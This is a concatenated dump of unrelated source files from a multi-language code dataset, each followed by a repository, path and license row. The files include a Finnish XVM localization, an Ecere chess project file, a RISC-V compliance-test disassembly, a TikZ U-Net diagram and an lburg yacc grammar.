"Average penetrations received": "Läpäisyjä vastaanotettu keskimäärin",
"Average ricochets received": "Kimmotettu keskimäärin",
"PutOwnCrew": "Aseta oma miehistö",
"PutBestCrew": "Aseta paras miehistö",
"PutClassCrew": "Aseta saman luokan miehistö",
"Vehicle": "Ajoneuvo",
"Battle tiers": "Taistelutasot",
"Type": "Tyyppi",
"Nation": "Kansallisuus",
"ussr": "Neuvostoliitto",
"germany": "Saksa",
"usa": "USA",
"france": "Ranska",
"uk": "Britannia",
"china": "Kiina",
"japan": "Japani",
"HT": "HT",
"MT": "MT",
"LT": "LT",
"TD": "TD",
"SPG": "SPG",
"blownUp": "Räjähti!",
"token/network_error": "Verkkovirhe. Ei yhteyttä XVM tilastoihin, yritä uudelleen myöhemmin.",
    "token/bad_token": "Virhe lukuoikeudessa XVM tilastoihin, {{l10n:token/notify_xvm_site}}",
"token/blocked": "Tila: <font color='#FF0000'>Estetty</font><br>{{l10n:token/notify_xvm_site}}",
"token/inactive": "Tila: <font color='#FFFF00'>Pois päältä</font><br>{{l10n:token/notify_xvm_site}}",
"token/active": "Tila: <font color='#00FF00'>Päällä</font>",
"token/days_left": "Päiviä jäljellä:<tab/><font color='#eeeeee'>{0}</font>",
"token/hours_left": "Tunteja jäljellä:<tab/><font color='#ffff00'>{0}</font>",
"token/cnt": "Kysely laskuri:<tab/><font color='#eeeeee'>{0}</font>",
"token/unknown_status": "Tunnistamaton tila",
    "token/notify_xvm_site": "<font color='#EEEEEE'>Ohjeet kirjautumiseen: Avaa linkki</font> <a href='#XVM_SITE#'>XVM site</a>. <font color='#FF0000'>Kirjaudu ulos pelistä.</font> <font color='#EEEEEE'>Vaihda avatun sivuston kieli englanniksi. Kirjautuessasi 'sign-in' valitse Eu-serveri. Kirjauduttuasi valitse 'activate', tai 'Prolong'. Voit jatkaa pelaamista. Useammalla tietokoneella valitse 'add PC'.</font>"
}
}
| XC | 4 | smola/language-dataset | data/github.com/Omegaice/WOTTankRanges/90067c21f69ee59e45e6f0ae48c02f1d3d0825b3/xvm/xvm/l10n/fi.xc | [
"MIT"
] |
Rem
Reserved for future expansions.
End Rem
| BlitzMax | 0 | jabdoa2/blitzmax | mod/brl.mod/blitz.mod/doc/delete.bmx | [
"Zlib"
] |
{
"Version" : 0.2,
"ModuleName" : "Chess",
"Options" : {
"TargetType" : "Executable",
"TargetFileName" : "chess",
"Libraries" : [
"ecere"
]
},
"Configurations" : [
{
"Name" : "Debug",
"Options" : {
"Debug" : true,
"Console" : true
}
},
{
"Name" : "Release",
"Options" : {
"Optimization" : "Speed"
}
},
{
"Name" : "MemoryGuard",
"Options" : {
"Debug" : true,
"MemoryGuard" : true,
"Console" : true
}
},
{
"Name" : "Android",
"Options" : {
"Optimization" : "Speed",
"PreprocessorDefinitions" : [
"HIGH_DPI"
],
"TargetType" : "SharedLibrary",
"TargetFileName" : "Chess",
"FastMath" : true,
"PostbuildCommands" : [
"$(call mkdirq,$(OBJ)apk/lib/x86)",
"$(call mkdirq,$(OBJ)apk/lib/armeabi)",
"$(call cpq,/sdk/ecere/obj/android.linux.$(COMPILER)/libecere.so,$(OBJ)apk/lib/armeabi)",
"$(call cpq,$(TARGET),$(OBJ)apk/lib/armeabi)",
"aapt package -v -f -m -M android/AndroidManifest.xml -F $(OBJ)$(MODULE)-unsigned.apk -I C:/android-sdk/platforms/android-16/android.jar -S android/res $(OBJ)apk",
"jarsigner -storepass mypassword -sigalg MD5withRSA -digestalg SHA1 $(OBJ)$(MODULE)-unsigned.apk mykey -signedjar $(OBJ)$(MODULE).apk",
"adb uninstall com.ecere.$(MODULE)",
"adb install $(OBJ)$(MODULE).apk",
"adb shell am start -a android.intent.action.MAIN -n com.ecere.$(MODULE)/android.app.NativeActivity"
]
}
}
],
"Files" : [
{
"Folder" : "src",
"Files" : [
"about.ec",
"ai.ec",
"chess.ec",
"chess2D.ec",
"chess3D.ec",
"chessutils.ec",
"connect.ec",
"promotion.ec"
]
},
{
"Folder" : "android",
"Files" : [
{
"Folder" : "res",
"Files" : [
{
"Folder" : "drawable",
"Files" : [
{
"FileName" : "icon.png",
"Options" : {
"ExcludeFromBuild" : true
}
}
]
},
{
"Folder" : "drawable-xhdpi",
"Files" : [
"icon.png"
]
},
{
"Folder" : "values",
"Files" : [
"strings.xml"
]
}
]
},
"AndroidManifest.xml"
]
}
],
"ResourcesPath" : "res",
"Resources" : [
"aboutPic.jpg",
"blackBishop.png",
"blackKing.png",
"blackKnight.png",
"blackPawn.png",
"blackQueen.png",
"blackRook.png",
"board.jpg",
"bthr.jpg",
"darkwood.jpg",
"lightwo1.jpg",
"whiteBishop.png",
"whiteKing.png",
"whiteKnight.png",
"whitePawn.png",
"whiteQueen.png",
"whiteRook.png",
"chessSet.3ds"
]
}
| Ecere Projects | 3 | Acidburn0zzz/ecere-sdk | samples/games/chess/chess.epj | [
"BSD-3-Clause"
] |
# @ECLASS: deprecated.eclass
# @MAINTAINER:
# Random Dev <random.dev@gentoo.org>
# @AUTHOR:
# Random Dev <random.dev@gentoo.org>
# @BLURB: Example deprecated eclass with no replacement.
# @DEPRECATED: none
# @FUNCTION: deprecated_public_func
# @USAGE:
# @DESCRIPTION:
# Public stub function.
deprecated_public_func() { :; }
| Gentoo Eclass | 4 | floppym/pkgcheck | testdata/repos/eclass/eclass/deprecated.eclass | [
"BSD-3-Clause"
] |
4 4 16
0 0 1
0 1 2
0 2 3
0 3 4
1 0 5
1 1 6
1 2 7
1 3 8
2 0 9
2 1 10
2 2 11
2 3 12
3 0 13
3 1 14
3 2 15
3 3 16
| IDL | 1 | ricortiz/OpenTissue | demos/data/dlm/4/A.dlm | [
"Zlib"
] |
include "ctokens.grm"
#pragma -width 32726 -raw
define program
[repeat programelement]
end define
define programelement
[key] [NL]
| [comment] [NL]
| [token] [NL]
end define
function main
match [program]
P [program]
end function
| TXL | 3 | pseudoPixels/SourceFlow | txl_features/txl_features/c/tokenize.txl | [
"MIT"
] |
# Tests that Spack ignores targets that contain a partial match
cflags = -Wall
rule cc
command = gcc $cflags -c $in -o $out
build installcheck: cc foo.c
build checkinstall: cc foo.c
build foo-check-bar: cc foo.c
build foo_check_bar: cc foo.c
build foo/check/bar: cc foo.c
| Ninja | 3 | kkauder/spack | lib/spack/spack/test/data/ninja/negative/partial_match/build.ninja | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
/home/spinalvm/hdl/riscv-compliance/work//C.ANDI.elf: file format elf32-littleriscv
Disassembly of section .text.init:
80000000 <_start>:
80000000: 0001 nop
80000002: 0001 nop
80000004: 0001 nop
80000006: 0001 nop
80000008: 0001 nop
8000000a: 0001 nop
8000000c: 0001 nop
8000000e: 0001 nop
80000010: 0001 nop
80000012: 0001 nop
80000014: 0001 nop
80000016: 0001 nop
80000018: 0001 nop
8000001a: 0001 nop
8000001c: 0001 nop
8000001e: 0001 nop
80000020: 0001 nop
80000022: 0001 nop
80000024: 0001 nop
80000026: 0001 nop
80000028: 0001 nop
8000002a: 0001 nop
8000002c: 0001 nop
8000002e: 0001 nop
80000030: 0001 nop
80000032: 0001 nop
80000034: 0001 nop
80000036: 0001 nop
80000038: 0001 nop
8000003a: 0001 nop
8000003c: 0001 nop
8000003e: 0001 nop
80000040: 0001 nop
80000042: 0001 nop
80000044: 0001 nop
80000046: 0001 nop
80000048: 0001 nop
8000004a: 0001 nop
8000004c: 0001 nop
8000004e: 0001 nop
80000050: 0001 nop
80000052: 0001 nop
80000054: 0001 nop
80000056: 0001 nop
80000058: 0001 nop
8000005a: 0001 nop
8000005c: 0001 nop
8000005e: 0001 nop
80000060: 0001 nop
80000062: 0001 nop
80000064: 0001 nop
80000066: 0001 nop
80000068: 0001 nop
8000006a: 0001 nop
8000006c: 0001 nop
8000006e: 0001 nop
80000070: 0001 nop
80000072: 0001 nop
80000074: 0001 nop
80000076: 0001 nop
80000078: 0001 nop
8000007a: 0001 nop
8000007c: 0001 nop
8000007e: 0001 nop
80000080: 0001 nop
80000082: 0001 nop
80000084: 0001 nop
80000086: 0001 nop
80000088: 0001 nop
8000008a: 0001 nop
8000008c: 0001 nop
8000008e: 0001 nop
80000090: 0001 nop
80000092: 0001 nop
80000094: 0001 nop
80000096: 0001 nop
80000098: 0001 nop
8000009a: 0001 nop
8000009c: 0001 nop
8000009e: 0001 nop
800000a0: 0001 nop
800000a2: 0001 nop
800000a4: 0001 nop
800000a6: 0001 nop
800000a8: 0001 nop
800000aa: 0001 nop
800000ac: 0001 nop
800000ae: 0001 nop
800000b0: 0001 nop
800000b2: 0001 nop
800000b4: 0001 nop
800000b6: 0001 nop
800000b8: 0001 nop
800000ba: 0001 nop
800000bc: 0001 nop
800000be: 0001 nop
800000c0: 0001 nop
800000c2: 0001 nop
800000c4: 0001 nop
800000c6: 0001 nop
800000c8: 0001 nop
800000ca: 0001 nop
800000cc: 0001 nop
800000ce: 0001 nop
800000d0: 0001 nop
800000d2: 0001 nop
800000d4: 0001 nop
800000d6: 0001 nop
800000d8: 0001 nop
800000da: 0001 nop
800000dc: 0001 nop
800000de: 0001 nop
800000e0: 0001 nop
800000e2: 0001 nop
800000e4: 0001 nop
800000e6: 0001 nop
800000e8: 0001 nop
800000ea: 0001 nop
800000ec: 0001 nop
800000ee: 00001117 auipc sp,0x1
800000f2: f1210113 addi sp,sp,-238 # 80001000 <codasip_signature_start>
800000f6: 4581 li a1,0
800000f8: 8981 andi a1,a1,0
800000fa: c02e sw a1,0(sp)
800000fc: 4601 li a2,0
800000fe: 8a05 andi a2,a2,1
80000100: c232 sw a2,4(sp)
80000102: 4681 li a3,0
80000104: 8ac1 andi a3,a3,16
80000106: c436 sw a3,8(sp)
80000108: 4701 li a4,0
8000010a: 8b7d andi a4,a4,31
8000010c: c63a sw a4,12(sp)
8000010e: 4781 li a5,0
80000110: 9b85 andi a5,a5,-31
80000112: c83e sw a5,16(sp)
80000114: 00001117 auipc sp,0x1
80000118: f0010113 addi sp,sp,-256 # 80001014 <test_2_res>
8000011c: 4405 li s0,1
8000011e: 8801 andi s0,s0,0
80000120: c022 sw s0,0(sp)
80000122: 4485 li s1,1
80000124: 8885 andi s1,s1,1
80000126: c226 sw s1,4(sp)
80000128: 4585 li a1,1
8000012a: 89c1 andi a1,a1,16
8000012c: c42e sw a1,8(sp)
8000012e: 4605 li a2,1
80000130: 8a7d andi a2,a2,31
80000132: c632 sw a2,12(sp)
80000134: 4685 li a3,1
80000136: 9a85 andi a3,a3,-31
80000138: c836 sw a3,16(sp)
8000013a: 00001117 auipc sp,0x1
8000013e: eee10113 addi sp,sp,-274 # 80001028 <test_3_res>
80000142: fff00713 li a4,-1
80000146: 8b01 andi a4,a4,0
80000148: c03a sw a4,0(sp)
8000014a: fff00793 li a5,-1
8000014e: 8b85 andi a5,a5,1
80000150: c23e sw a5,4(sp)
80000152: fff00413 li s0,-1
80000156: 8841 andi s0,s0,16
80000158: c422 sw s0,8(sp)
8000015a: fff00493 li s1,-1
8000015e: 88fd andi s1,s1,31
80000160: c626 sw s1,12(sp)
80000162: fff00593 li a1,-1
80000166: 9985 andi a1,a1,-31
80000168: c82e sw a1,16(sp)
8000016a: 00001117 auipc sp,0x1
8000016e: ed210113 addi sp,sp,-302 # 8000103c <test_4_res>
80000172: 00080637 lui a2,0x80
80000176: fff60613 addi a2,a2,-1 # 7ffff <_start-0x7ff80001>
8000017a: 8a01 andi a2,a2,0
8000017c: c032 sw a2,0(sp)
8000017e: 000806b7 lui a3,0x80
80000182: fff68693 addi a3,a3,-1 # 7ffff <_start-0x7ff80001>
80000186: 8a85 andi a3,a3,1
80000188: c236 sw a3,4(sp)
8000018a: 00080737 lui a4,0x80
8000018e: fff70713 addi a4,a4,-1 # 7ffff <_start-0x7ff80001>
80000192: 8b41 andi a4,a4,16
80000194: c43a sw a4,8(sp)
80000196: 000807b7 lui a5,0x80
8000019a: fff78793 addi a5,a5,-1 # 7ffff <_start-0x7ff80001>
8000019e: 8bfd andi a5,a5,31
800001a0: c63e sw a5,12(sp)
800001a2: 00080437 lui s0,0x80
800001a6: fff40413 addi s0,s0,-1 # 7ffff <_start-0x7ff80001>
800001aa: 9805 andi s0,s0,-31
800001ac: c822 sw s0,16(sp)
800001ae: 00001117 auipc sp,0x1
800001b2: ea210113 addi sp,sp,-350 # 80001050 <test_5_res>
800001b6: 000804b7 lui s1,0x80
800001ba: 8881 andi s1,s1,0
800001bc: c026 sw s1,0(sp)
800001be: 000805b7 lui a1,0x80
800001c2: 8985 andi a1,a1,1
800001c4: c22e sw a1,4(sp)
800001c6: 00080637 lui a2,0x80
800001ca: 8a41 andi a2,a2,16
800001cc: c432 sw a2,8(sp)
800001ce: 000806b7 lui a3,0x80
800001d2: 8afd andi a3,a3,31
800001d4: c636 sw a3,12(sp)
800001d6: 00080737 lui a4,0x80
800001da: 9b05 andi a4,a4,-31
800001dc: c83a sw a4,16(sp)
800001de: 00001517 auipc a0,0x1
800001e2: e2250513 addi a0,a0,-478 # 80001000 <codasip_signature_start>
800001e6: 00001597 auipc a1,0x1
800001ea: e8a58593 addi a1,a1,-374 # 80001070 <_end>
800001ee: f0100637 lui a2,0xf0100
800001f2: f2c60613 addi a2,a2,-212 # f00fff2c <_end+0x700feebc>
800001f6 <complience_halt_loop>:
800001f6: 00b50c63 beq a0,a1,8000020e <complience_halt_break>
800001fa: 4554 lw a3,12(a0)
800001fc: c214 sw a3,0(a2)
800001fe: 4514 lw a3,8(a0)
80000200: c214 sw a3,0(a2)
80000202: 4154 lw a3,4(a0)
80000204: c214 sw a3,0(a2)
80000206: 4114 lw a3,0(a0)
80000208: c214 sw a3,0(a2)
8000020a: 0541 addi a0,a0,16
8000020c: b7ed j 800001f6 <complience_halt_loop>
8000020e <complience_halt_break>:
8000020e: f0100537 lui a0,0xf0100
80000212: f2050513 addi a0,a0,-224 # f00fff20 <_end+0x700feeb0>
80000216: 00052023 sw zero,0(a0)
...
Disassembly of section .data:
80001000 <codasip_signature_start>:
80001000: ffff 0xffff
80001002: ffff 0xffff
80001004: ffff 0xffff
80001006: ffff 0xffff
80001008: ffff 0xffff
8000100a: ffff 0xffff
8000100c: ffff 0xffff
8000100e: ffff 0xffff
80001010: ffff 0xffff
80001012: ffff 0xffff
80001014 <test_2_res>:
80001014: ffff 0xffff
80001016: ffff 0xffff
80001018: ffff 0xffff
8000101a: ffff 0xffff
8000101c: ffff 0xffff
8000101e: ffff 0xffff
80001020: ffff 0xffff
80001022: ffff 0xffff
80001024: ffff 0xffff
80001026: ffff 0xffff
80001028 <test_3_res>:
80001028: ffff 0xffff
8000102a: ffff 0xffff
8000102c: ffff 0xffff
8000102e: ffff 0xffff
80001030: ffff 0xffff
80001032: ffff 0xffff
80001034: ffff 0xffff
80001036: ffff 0xffff
80001038: ffff 0xffff
8000103a: ffff 0xffff
8000103c <test_4_res>:
8000103c: ffff 0xffff
8000103e: ffff 0xffff
80001040: ffff 0xffff
80001042: ffff 0xffff
80001044: ffff 0xffff
80001046: ffff 0xffff
80001048: ffff 0xffff
8000104a: ffff 0xffff
8000104c: ffff 0xffff
8000104e: ffff 0xffff
80001050 <test_5_res>:
80001050: ffff 0xffff
80001052: ffff 0xffff
80001054: ffff 0xffff
80001056: ffff 0xffff
80001058: ffff 0xffff
8000105a: ffff 0xffff
8000105c: ffff 0xffff
8000105e: ffff 0xffff
80001060: ffff 0xffff
80001062: ffff 0xffff
...
| ObjDump | 2 | cbrune/VexRiscv | src/test/resources/asm/C.ANDI.elf.objdump | [
"MIT"
] |
# redo build script: decide how manpages get generated.
# Probe md2man.py with dummy files; if its Python module dependencies are
# present, emit (on stdout) the command line that converts $2.md.tmp to
# $2.html.  Otherwise warn on stderr and emit a stub command that only
# reports the page as skipped.
redo-ifchange md2man.py ../redo/py
if ../redo/py ./md2man.py /dev/null /dev/null >/dev/null; then
echo '../redo/py ./md2man.py $2.md.tmp $2.html'
else
echo "Warning: md2man.py missing modules; can't generate manpages." >&2
echo "Warning: try this: sudo easy_install markdown BeautifulSoup" >&2
echo 'echo Skipping: $2.1 >&2'
fi
| Stata | 3 | BlameJohnny/redo | docs/md-to-man.do | [
"Apache-2.0"
] |
A ← 3 2 ⍴ ⍳ 5 ⍝ Example input A
B ← ⍉ A ⍝ Example input B
WA ← (1↓⍴B),⍴A
KA ← (⊃⍴⍴A)-1
VA ← ⍳ ⊃ ⍴WA
ZA ← (KA⌽¯1↓VA),¯1↑VA
TA ← ZA⍉WA⍴A
WB ← (¯1↓⍴A),⍴B
KB ← ⊃ ⍴⍴A
VB ← ⍳ ⊃ ⍴WB
ZB0 ← (-KB) ↓ KB ⌽ ⍳(⊃⍴VB)
ZB ← (¯1↓(⍳ KB)),ZB0,KB
TB ← ZB⍉WB⍴B
R ← +/ 3 3 2 ⍴ TA×TB
R2 ← ×/ +/ R
⍝ 1 3 5
⍝ 2 4 1
⍝
⍝ 1 2 5 11 7 -+-> 23
⍝ 3 4 11 25 19 -+-> 55
⍝ 5 1 7 19 26 -+-> 52
⍝ 65780
| APL | 3 | mbudde/apltail | tests/inner2.apl | [
"MIT"
] |
\documentclass[border=8pt, multi, tikz]{standalone}
%\usepackage{blocks}
\usepackage{import}
\subimport{../../layers/}{init}
\usetikzlibrary{positioning}
\def\ConvColor{rgb:yellow,5;red,2.5;white,5}
\def\ConvReluColor{rgb:yellow,5;red,5;white,5}
\def\PoolColor{rgb:red,1;black,0.3}
\def\UnpoolColor{rgb:blue,2;green,1;black,0.3}
\def\ConcatColor{rgb:blue,5;red,2.5;white,5}
\def\FcReluColor{rgb:blue,5;red,5;white,4}
\def\SoftmaxColor{rgb:magenta,5;black,7}
\newcommand{\copymidarrow}{\tikz \draw[-Stealth,line width =0.8mm,draw={rgb:blue,4;red,1;green,1;black,3}] (-0.3,0) -- ++(0.3,0);}
\begin{document}
\begin{tikzpicture}
\tikzstyle{connection}=[ultra thick,every node/.style={sloped,allow upside down},draw=\edgecolor,opacity=0.7]
\tikzstyle{copyconnection}=[ultra thick,every node/.style={sloped,allow upside down},draw={rgb:blue,4;red,1;green,1;black,3},opacity=0.7]
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Draw Encoder
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% conv1_1,conv1_2
\pic[shift={(0,0,0)}] at (0,0,0) {RightBandedBox={name=cr1,%
xlabel={{"64","64"}},caption=I,fill=\ConvColor,bandfill=\ConvReluColor,%
height=40,width={2,2},depth=40}};
%pool1
\pic[shift={(1.2,-10,0)}] at (cr1-east) {Box={name=p1,%
fill=\PoolColor,opacity=0.6,height=32,width=1,depth=32}};
%%%%%%%%%%
% conv2_1,conv2_2
\pic[shift={(0,0,0)}] at (p1-east) {RightBandedBox={name=cr2,%
xlabel={{"128","128"}},caption=I/2,fill=\ConvColor,bandfill=\ConvReluColor,%
height=32,width={3.5,3.5},depth=32}};
%pool2
\pic[shift={(1.2,-8.5,0)}] at (cr2-east) {Box={name=p2,%
fill=\PoolColor,opacity=0.6,height=25,width=1,depth=25}};
%%%%%%%%%%
% conv3_1,conv3_2
\pic[shift={(0,0,0)}] at (p2-east) {RightBandedBox={name=cr3,%
xlabel={{"256","256"}},caption=I/4,fill=\ConvColor,bandfill=\ConvReluColor,%
height=25,width={4.5,4.5},depth=25}};
%pool3
\pic[shift={(1.2,-6.5,0)}] at (cr3-east) {Box={name=p3,%
fill=\PoolColor,opacity=0.6,height=16,width=1,depth=16}};
%%%%%%%%%%
% conv4_1,conv4_2,conv4_3
\pic[shift={(0,0,0)}] at (p3-east) {RightBandedBox={name=cr4,%
xlabel={{"512","512"}},caption=I/8,fill=\ConvColor,bandfill=\ConvReluColor,%
height=16,width={6,6},depth=16}};
%pool4
\pic[shift={(1.2,-3,0)}] at (cr4-east) {Box={name=p4,%
fill=\PoolColor,opacity=0.6,height=8,width=1,depth=8}};
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Bottleneck
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% conv5_1,conv5_2,conv5_3
\pic[shift={(0,0,0)}] at (p4-east) {RightBandedBox={name=cr5,caption=I/16,%
xlabel={{"1024","1024"}},fill=\ConvColor,bandfill=\ConvReluColor,%
height=8,width={8,8},depth=8}};
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Draw Decoder
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% unpool4,
\pic[shift={(0,0,0)}] at (cr5-east) {Box={name=up4,%
fill=\UnpoolColor,opacity=0.6,height=16,width=1,depth=16}};
\pic[shift={(0,0,0)}] at (up4-east) {RightBandedBox={name=ucr4,%
xlabel={{"512","dummy"}},caption=I/8,fill=\ConvColor,bandfill=\ConvReluColor,%
height=16,width=6,depth=16}};
\pic[shift={(0,3,0)}] at (ucr4-anchor) {Ball={name=cat4,fill=\ConcatColor,radius=2.5,logo=$||$}};
\pic[shift={(1.4,0,0)}] at (cat4-east) {RightBandedBox={name=ucr4a,%
xlabel={{"512","512"}},caption=I/8,fill=\ConvColor,bandfill=\ConvReluColor,%
height=16,width={6,6},depth=16}};
%%%%%%%%%%
%% unpool3,
\pic[shift={(0,0,0)}] at (ucr4a-east) {Box={name=up3,%
fill=\UnpoolColor,opacity=0.6,height=25,width=1,depth=25}};
\pic[shift={(0,0,0)}] at (up3-east) {RightBandedBox={name=ucr3,%
xlabel={{"256","dummy"}},caption=I/4,fill=\ConvColor,bandfill=\ConvReluColor,%
height=25,width=4.5,depth=25}};
\pic[shift={(0,6.5,0)}] at (ucr3-anchor) {Ball={name=cat3,fill=\ConcatColor,radius=2.5,logo=$||$}};
\pic[shift={(1.5,0,0)}] at (cat3-east) {RightBandedBox={name=ucr3a,%
xlabel={{"256","256"}},caption=I/4,fill=\ConvColor,bandfill=\ConvReluColor,%
height=25,width={4.5,4.5},depth=25}};
%%%%%%%%%%
%% unpool2,
\pic[shift={(0,0,0)}] at (ucr3a-east) {Box={name=up2,%
fill=\UnpoolColor,opacity=0.6,height=32,width=1,depth=32}};
\pic[shift={(0,0,0)}] at (up2-east) {RightBandedBox={name=ucr2,%
xlabel={{"128","dummy"}},caption=I/2,fill=\ConvColor,bandfill=\ConvReluColor,%
height=32,width=3.5,depth=32}};
\pic[shift={(0,8.5,0)}] at (ucr2-anchor) {Ball={name=cat2,fill=\ConcatColor,radius=2.5,logo=$||$}};
\pic[shift={(1.8,0,0)}] at (cat2-east) {RightBandedBox={name=ucr2a,%
xlabel={{"128","128"}},caption=I/2,fill=\ConvColor,bandfill=\ConvReluColor,%
height=32,width={3.5,3.5},depth=32}};
%%%%%%%%%%
%% unpool1,
\pic[shift={(0,0,0)}] at (ucr2a-east) {Box={name=up1,%
fill=\UnpoolColor,opacity=0.6,height=40,width=1,depth=40}};
\pic[shift={(0,0,0)}] at (up1-east) {RightBandedBox={name=ucr1,%
xlabel={{"64","dummy"}},caption=I,fill=\ConvColor,bandfill=\ConvReluColor,%
height=40,width=2.5,depth=40}};
\pic[shift={(0,10,0)}] at (ucr1-anchor) {Ball={name=cat1,fill=\ConcatColor,radius=2.5,logo=$||$}};
\pic[shift={(2,0,0)}] at (cat1-east) {RightBandedBox={name=ucr1a,%
xlabel={{"64","64"}},caption=I,fill=\ConvColor,bandfill=\ConvReluColor,%
height=40,width={2.5,2.5},depth=40}};
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Classifier
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\pic[shift={(2,0,0)}] at (ucr1a-east) {Box={name=out,caption=Softmax,%
zlabel=I,fill=\SoftmaxColor,height=40,width=1,depth=40}};
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% Draw connections
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\path (cr1-east) -- (p1-west|-cr1-west) coordinate[pos=0.5] (crp1-mid) ;
\path (cr2-east) -- (p2-west|-cr2-west) coordinate[pos=0.5] (crp2-mid) ;
\path (cr3-east) -- (p3-west|-cr3-west) coordinate[pos=0.5] (crp3-mid) ;
\path (cr4-east) -- (p4-west|-cr4-west) coordinate[pos=0.5] (crp4-mid) ;
\draw[connection](cr1-east)--node{\midarrow}(crp1-mid)--node{\midarrow}(p1-west-|crp1-mid)--node{\midarrow}(p1-west);
\draw[connection](cr2-east)--node{\midarrow}(crp2-mid)--node{\midarrow}(p2-west-|crp2-mid)--node{\midarrow}(p2-west);
\draw[connection](cr3-east)--node{\midarrow}(crp3-mid)--node{\midarrow}(p3-west-|crp3-mid)--node{\midarrow}(p3-west);
\draw[connection](cr4-east)--node{\midarrow}(crp4-mid)--node{\midarrow}(p4-west-|crp4-mid)--node{\midarrow}(p4-west);
%\draw [connection] (cr5-east) -- node {\midarrow} (up4-west);
%\draw [connection] (ucr4a-east) -- node {\midarrow} (up3-west);
%\draw [connection] (ucr3a-east) -- node {\midarrow} (up2-west);
%\draw [connection] (ucr2a-east) -- node {\midarrow} (up1-west);
\draw [connection] (ucr1a-east) -- node {\midarrow} (out-west);
%\draw [connection] (out-east) -- node {\midarrow} ++(2,0,0);
\draw [copyconnection] (cr4-east) -- node {\copymidarrow} (cat4-west);
\draw [copyconnection] (cr3-east) -- node {\copymidarrow} (cat3-west);
\draw [copyconnection] (cr2-east) -- node {\copymidarrow} (cat2-west);
\draw [copyconnection] (cr1-east) -- node {\copymidarrow} (cat1-west);
\draw [copyconnection] (cat4-east) -- node {\copymidarrow} (ucr4a-west);
\draw [copyconnection] (cat3-east) -- node {\copymidarrow} (ucr3a-west);
\draw [copyconnection] (cat2-east) -- node {\copymidarrow} (ucr2a-west);
\draw [copyconnection] (cat1-east) -- node {\copymidarrow} (ucr1a-west);
\draw [copyconnection] (ucr4-north) -- node {\copymidarrow} (cat4-south);
\draw [copyconnection] (ucr3-north) -- node {\copymidarrow} (cat3-south);
\draw [copyconnection] (ucr2-north) -- node {\copymidarrow} (cat2-south);
\draw [copyconnection] (ucr1-north) -- node {\copymidarrow} (cat1-south);
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\end{tikzpicture}
\end{document}
| TeX | 4 | yz-hust/PlotNeuralNet | examples/Unet_Ushape/Unet_ushape.tex | [
"MIT"
] |
%{
#include <stdio.h>
#include "lburg.h"
static char rcsid[] = "$Id: gram.y 145 2001-10-17 21:53:10Z timo $";
/*lint -e616 -e527 -e652 -esym(552,yynerrs) -esym(563,yynewstate,yyerrlab) */
static int yylineno = 0;
%}
%union {
int n;
char *string;
Tree tree;
}
%term TERMINAL
%term START
%term PPERCENT
%token <string> ID TEMPLATE CODE
%token <n> INT
%type <string> nonterm cost
%type <tree> tree
%%
spec : decls PPERCENT rules { yylineno = 0; }
| decls { yylineno = 0; }
;
decls : /* lambda */
| decls decl
;
decl : TERMINAL blist '\n'
| START nonterm '\n' {
if (nonterm($2)->number != 1)
yyerror("redeclaration of the start symbol\n");
}
| '\n'
| error '\n' { yyerrok; }
;
blist : /* lambda */
| blist ID '=' INT { term($2, $4); }
;
rules : /* lambda */
| rules nonterm ':' tree TEMPLATE cost '\n' { rule($2, $4, $5, $6); }
| rules '\n'
| rules error '\n' { yyerrok; }
;
nonterm : ID { nonterm($$ = $1); }
;
tree : ID { $$ = tree($1, 0, 0); }
| ID '(' tree ')' { $$ = tree($1, $3, 0); }
| ID '(' tree ',' tree ')' { $$ = tree($1, $3, $5); }
;
cost : CODE { if (*$1 == 0) $$ = "0"; }
;
%%
#include <assert.h>
#include <stdarg.h>
#include <ctype.h>
#include <string.h>
#include <limits.h>
int errcnt = 0;
FILE *infp = NULL;
FILE *outfp = NULL;
static char buf[BUFSIZ], *bp = buf;
static int ppercent = 0;
static int code = 0;
/* Return the next input character, refilling `buf` from `infp` one line
 * at a time via the cursor `bp`.  %{ ... %} sections are copied straight
 * to `outfp` instead of being tokenized.  Returns EOF at end of input. */
static int get(void) {
    if (*bp == 0) {
        bp = buf;
        *bp = 0;
        if (fgets(buf, sizeof buf, infp) == NULL)
            return EOF;
        yylineno++;
        /* pass literal %{ ... %} blocks through to the output verbatim */
        while (buf[0] == '%' && buf[1] == '{' && buf[2] == '\n') {
            for (;;) {
                if (fgets(buf, sizeof buf, infp) == NULL) {
                    yywarn("unterminated %{...%}\n");
                    return EOF;
                }
                yylineno++;
                if (strcmp(buf, "%}\n") == 0)
                    break;
                fputs(buf, outfp);
            }
            if (fgets(buf, sizeof buf, infp) == NULL)
                return EOF;
            yylineno++;
        }
    }
    return *bp++;
}
